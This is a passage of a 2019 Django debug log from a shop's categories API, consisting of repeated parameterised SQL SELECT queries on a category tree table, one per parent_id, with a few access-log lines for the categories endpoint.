"shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 14:08:45] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 14:08:56,839 utils 4252 140031747061504 (0.007) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 14:08:56,858 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 14:08:56,865 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 14:08:56,870 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 14:08:56,876 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 14:08:56,881 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 14:08:56,885 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 14:08:56,889 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 14:08:56,893 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 14:08:56,899 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 14:08:56,903 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 14:08:56,907 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 14:08:56,912 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 14:08:56,917 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 14:08:56,924 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 14:08:56,929 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 14:08:56,933 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 14:08:56,938 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 14:08:56,942 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 14:08:56,950 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 14:08:56,954 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 14:08:56,958 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 14:08:56,961 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 14:08:56,965 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 14:08:56,969 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 14:08:56,974 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 14:08:56,977 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 14:08:56,979 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 14:08:56,982 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 14:08:56,987 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 14:08:56,991 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 14:08:56,994 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 14:08:56,996 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 14:08:56,999 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 14:08:57,001 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 14:08:57,005 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 14:08:57,007 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 14:08:57,010 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 14:08:57,012 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 14:08:57,015 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 14:08:57,017 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 14:08:57,021 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 14:08:57,023 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 14:08:57,026 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 14:08:57,029 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 14:08:57,031 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 14:08:57] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 14:09:14,427 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 14:09:14,436 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 14:09:14,444 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 14:09:14,448 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 14:09:14,451 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 14:09:14,453 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 14:09:14,456 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 14:09:14,458 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 14:09:14,460 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 14:09:14,463 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 14:09:14,467 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 14:09:14,471 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 14:09:14,475 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 14:09:14,478 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 14:09:14,485 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 14:09:14,489 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 14:09:14,493 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 14:09:14,497 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 14:09:14,501 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 14:09:14,508 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 14:09:14,512 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY 